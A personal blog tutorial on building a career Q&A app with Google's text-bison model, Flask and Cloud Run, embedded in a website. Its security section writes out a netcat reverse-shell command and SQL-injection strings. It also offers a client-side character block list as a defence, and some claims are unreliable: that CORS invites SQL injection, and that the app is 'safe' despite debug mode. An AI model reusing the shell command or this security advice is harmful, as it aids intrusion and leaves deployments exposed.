Deploying a Google Cloud Generative AI App in a Website with Cloud Run

Published in

Google Cloud - Community

11 min readJul 14, 2023

In May 2023 I quit my job to spend some months relaxing, organizing knowledge, learning new things and going back to swimming. The last 6 years were a wild ride using ML, Deep Learning and Google Cloud in a Brazilian startup, delivering PoCs, projects and working on R&D. After leaving the company, I developed a personal website where I wanted to concentrate all my activities, articles, projects, papers, social media presence and experiments.

I bought a domain at Google Domains (www.rubenszimbres.phd) and started developing the website using Google Sites, which is very intuitive. I wanted it to be interactive and also contain some Generative AI applications.

The first thing I did was to develop a customized QR Code to send me an email, with HuggingFace QR Code Art Generator, available here. Although the app has lots of hyperparameters, it was quite simple to generate this working result:

However, I wanted something more interactive. What if people could ask details about my professional path, instead of scrolling the About me page? Then I had the idea of developing an application using Generative AI.

In this article I will provide the details of the process to create and deploy a Generative AI application, including costs and some cybersecurity aspects to ensure the safety of the web application.

When you enter the Vertex AI page in Google Cloud, you have some options regarding Generative AI:

Model Garden: here you can find models for classification, extraction, summarization, models for conversational chatbots, transcription and embedding generation. In Model Garden you can also fine tune EfficientNet and YOLO, for classification and object detection. There are also pre-built models to detect cars, people, content classification, syntactic and sentiment analysis, among others.
Generative AI Studio: composed of language and speech APIs for use in chatbots, text summarization, content generation, classification and question answering, speech-to-text and text-to-speech. Here you have multiple modalities of models and you can tune them with your own data.

In the Google Cloud console / Vertex AI, I selected Generative AI Studio and created a new prompt. As Context, I provided my professional path so far, and also provided some Examples of simple questions and answers, so that the model can make use of few-shot learning, a Machine Learning technique that allows a pre-trained model to generalize over new data using only a few labeled samples:

At the right part of the Google Cloud console, you can tune the hyperperameters of the text generation algorithm (in this case text-bison@001).

The bigger the Temperature value is, the more random, diverse and creative the response will be. I wanted the response to be strictly related to my professional path, so I used 0.2. I set the Token limit to 256 (the amount of text that is generated). As a Top-k value I used 1 (between 1 and 40) to restrict the options of responses in order to provide a more rational and less diverse response A small top-k will restrict the choices of the algorithm, a bigger top-k will allow it to have more freedom. Top-p value stands for the cumulative probability of a range of tokens in the response. For a wider range of the response, I used 0.8, as the model can effectively build a response using data from one or more paragraphs.

The scope for hyperparameter tuning is huge. My idea was to make a MVP (Minimum Viable Product) and then work in the fine details. You will see that the integration of GitHub with Google Cloud Build makes CI/CD trivial, as you only git commit from the command line to update the container code.

As this was a personal project, I didn’t opt to use Dialogflow, as I don’t know the amount of traffic it will receive and this could become costly. However, if you are interested in this solution (semantic search, conversational chatbot integration, summarization, etc), you can use Gen App Builder. As I like to build things from scratch, I opted to use a container hosted in Cloud Run, where I can control exactly how much money I will spend. I’ll talk about infrastructure and costs later in this article.

Back to the text generation model, the right part of the Google Cloud console also shows a button < > View Code. If you click on it, you will have the code to operationalize the solution, which we will save in a prediction.py file. Here I added the Flask application:

import vertexai
from vertexai.language_models import TextGenerationModel
from flask import Flask, request, jsonify
from flask_cors import CORS
import json
from collections import Counter

vertexai.init(project="your-project", location="us-central1")
parameters = {
    "temperature": 0.2,
    "max_output_tokens": 256,
    "top_p": 0.8,
    "top_k": 1
}
model = TextGenerationModel.from_pretrained("text-bison@001")

app = Flask(__name__)
CORS(app)

@app.route('/predict', methods= ['POST'])
def predict():
    if request.get_json():
        x=json.dumps(request.get_json())
        print('ok')
        x=json.loads(x)
    else:
        x={}
    data=x["text"]  # text
    print(data)

    response = model.predict(
        """Rubens Zimbres professional path here ....

Q: Which languages Rubens speak ?
A: His English is fluent, he speaks native Portuguese and advanced spanish

Q: Where did Rubens work ?
A: He worked at Intellimetri as a Senior Data Scientist and Machine Learning Engineer, at Vecto Mobile as a data scientist and as a Business Intelligence Analyst at Doux Dermatology

Q: Which cloud technologies does Rubens work with ?
A: AWS and Google Cloud, but mainly Google Cloud

Q: {} ?
A:
""".format(data)

        ,**parameters)
    response=jsonify(response.text)
    response.headers.add('Access-Control-Allow-Origin', '*')
    return response



if __name__ == "__main__":
    app.run(port=8080, host='0.0.0.0', debug=True)

I used text-bison@001, PaLM API’s most capable model size that has the ability to generate text. It is optimized for language tasks such as:

Code generation
Text generation
Text editing
Problem solving
Recommendations generation
Information extraction
Data extraction or generation
AI agent

It can also handle zero, one, and few-shot tasks, what is useful for our use case.

As we are deploying in Cloud Run, we have to build a Flask application inside the container, embedded in the code. Besides, we need a requirements.txt file:

Flask==2.2.2
Flask-Cors==4.0.0
google-cloud-aiplatform==1.27.1

And also a Dockerfile:

FROM python:3.9

EXPOSE 8080
ENV PORT 8080

RUN groupadd -g 1000 userweb && \
    useradd -r -u 1000 -g userweb userweb

WORKDIR /home
RUN chown userweb:userweb /home

USER userweb

COPY . /home
RUN pip install -r /home/requirements.txt

CMD python3 /home/prediction.py

Note that I’m not using USER root for security reasons. Best practices tells us to avoid running containers as root user, because if a malicious actor gets a reverse shell, he will have access to absolutely everything.

Once we have these three files (prediction.py, requirements.txt and Dockerfile) in the same folder locally, we will run the following code with gcloud to build an image in Google Cloud Artifact Registry:

gcloud auth login
gcloud config set project your-project
gcloud builds submit --tag gcr.io/your-project/container-xxx . --timeout=85000

Now that the image was built in Artifact Registry, we will deploy it in Cloud Run. Cloud Run calls Gen AI API via service account, internally on GCP. You should never store your service account key.json inside a container for authentication.

Note that I talked about costs of the solution. In this case, I’m using 1 CPU with 512 Mb of memory (yes, that small !), with minimum and maximum of instances equal to 1, that is always running:

gcloud run deploy container-genai-xxx --image gcr.io/your-project/container-xxx --min-instances 1 --max-instances 1 --cpu 1 --allow-unauthenticated --memory 512Mi --region us-central1 --concurrency 3

It was a very interesting experience to develop something so tiny. The total response time for the app is 2.59 seconds, mainly due to the Gen AI endpoint response delay. Flask response is 259 milliseconds. If you allow Cloud Run to scale to zero (minimum of instances), you will save money drastically but the response time will increase to 12 seconds due to cold start.

The cost involved resides in the Artifact Registry (image), Cloud Run, Networking and also the API calls to Generative AI in Vertex AI. Overall, this small scale solution costs me 0.7 USD daily, plus the Gen AI API calls, that cost 0.001 USD for each 1,000 characters.

Note that this can scale to a huge amount of API calls adapting CPU, Memory, concurrency and min and max-instances, as Cloud Run supports autoscaling.

The endpoint is running, but nothing on my website yet. In fact I had previous experience with forms in HTML, but I had never called an endpoint from a website page. I had no idea how to do it. As Bard is still in an early experiment regarding code generation, I asked ChatGPT, who helped build 80% of the HTML application, but it didn’t solve the problem appropriately at first. I used the following prompt:

“I’d like to build a HTML code with a text area to collect input from the user with 4 rows and 50 columns, submit this text using a HttpRequest, using POST method in an endpoint called endpoint.xxx.app/predict sending a stringfied JSON in the following format {“text”: text}. Then, I want the http response to be assigned to a new element with id response.”

The code provided by ChatGPT didn’t work perfectly, and Duet AI helped me to create the HTTP assignment for the response. Here’s the final code:

<!DOCTYPE html>
<html>

<head>
  <title>Gen AI App</title>
  <style>
    /* Add a CSS style block to modify the button color */
    #submitBtn {
      background-color: lime;
    }
  </style>
</head>

<body>

  <form>
    <textarea id="textInput" maxlength="150" rows="4" cols="70" name="textInput" oninput="updateCharacterCount()"></textarea>
<div id="characterCount"></div>
    <br>
    <input id="submitBtn" type="button" value="Generate Response" onclick="return validateAndSubmit()">
  </form>

  <br>
  <div id="response"></div>
  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

  <script>
  function updateCharacterCount() {
    var textarea = document.getElementById("textInput");
    var characterCount = document.getElementById("characterCount");
    characterCount.innerHTML = 150 - textarea.value.length;
  }
 </script>
 <script>
 function validateAndSubmit() {
      var textarea = document.getElementById("textInput");
      var input = textarea.value;
      var regex = /[,"\\\/#@*|!=]/g;
      
      if (regex.test(input)) {
        alert("Invalid input! The symbols \", \\, #, @, *, |, and ! are not allowed.");
        return false;
      }

      submitText(input);
    }
  </script>
 <script>

  function submitText() {
      var texto = document.getElementById("textInput").value;
      $.ajax({
        url: 'https://container-xxx.a.run.app/predict',
        type: 'POST',
        contentType: 'application/json',
        data: JSON.stringify({"text": texto}),
        success: function(response) {
          document.getElementById("response").innerText = response;
        }
      });
    };
  </script>
</body>
</html>

This code worked perfectly (response 200 in Cloud Run monitoring), but in my case, the button was not returning the response in the web page.

When I right-clicked the form in the published website + Inspect / Network, I got the following: CORS error.

I asked Bard: “Which are the causes of CORS error in a website and how can I solve it ?”. The response was: The origin of the request is not allowed to access the resource. By Googling both CORS + origin of the request is not allowed to access the resource + Flask I was able to fix the code in the container by adding CORS(app):

from flask_cors import CORS

app = Flask(__name__)
CORS(app)

However, what happened is subtle: by activating CORS (Cross-Origin Resource Sharing) I introduced a vulnerability in the website, because malicious actors (hackers) can now try to inject code via form, in attacks as XSS (Cross-Site Scripting), CSRF (Cross-Site Request Forgery) or even SQL Injection. It’s known that 70% of cyberattacks happen because of misconfigurations.

To reduce the attack surface regarding these vulnerabilities, it is crucial to properly configure CORS policies on the server-side, validate and sanitize input data, implement appropriate access controls, and follow security best practices throughout the application development process.

One of the tools I applied to overcome this weakness is the script validateAndSubmit(): it validates input before submitting form data. Sanitizing is not so simple (and this should be addressed in Generative AI cybersecurity studies), as we need the ‘ (single quotes) character in natural language, like “I’d like to know …” . If we block double quotes “ OR “A”=”A” the attacker can still run ‘ OR ‘A’ = ‘A’ in a SQL Injection. However, by removing some special characters, it makes a little more difficult to get a reverse shell on the container. For instance, docker run raesene/ncat 192.168.200.1 8989 -e /bin/sh will not work. Any prompt with special characters rather than ‘ (single quotes) will not submit data to the endpoint.

Then I tested the domain for CORS misconfiguration with Corsy and CORScanner. Both returned no misconfigurations after the adjustments:

Now the application is safe and working well:

Qualitatively analyzing the results, they seem to be right in the MVP, without any hyperparameter tuning, with only 3 short examples provided. Based on the question and the response below, initially I thought there could be bias in the response:

However, when I asked if I was a fit for the role of Junior Data Engineer, the LLM surprised me:

The results are reproducible, as I set up the LLM hyperparameters to obtain a less diverse result. You can access the App in my website in the home page and also at:

https://www.rubenszimbres.phd/generative-ai

Once the MVP is complete, we can improve hyperparameter tuning for better responses. But what if you want to run multiple tests and deploy a new version of the code within 5 minutes? Do you have to run gcloud builds submit — tag gcr.io…. + gcloud run deploy container-xxx….. every time?

The answer is No. In the Cloud Run console, there is a button:

There you can connect your code to a continuous deployment of Cloud Run via Cloud Build, as long as you commit the code to the GitHub repo. Traffic for the new deployment is automatically redirected.

Time for you to try. With as few as 10 lines of Python code, and a small infrastructure, you can make use of all Generative AI capabilities of Google Cloud =)

Deploying a Google Cloud Generative AI App in a Website with Cloud Run

Written by Rubens Zimbres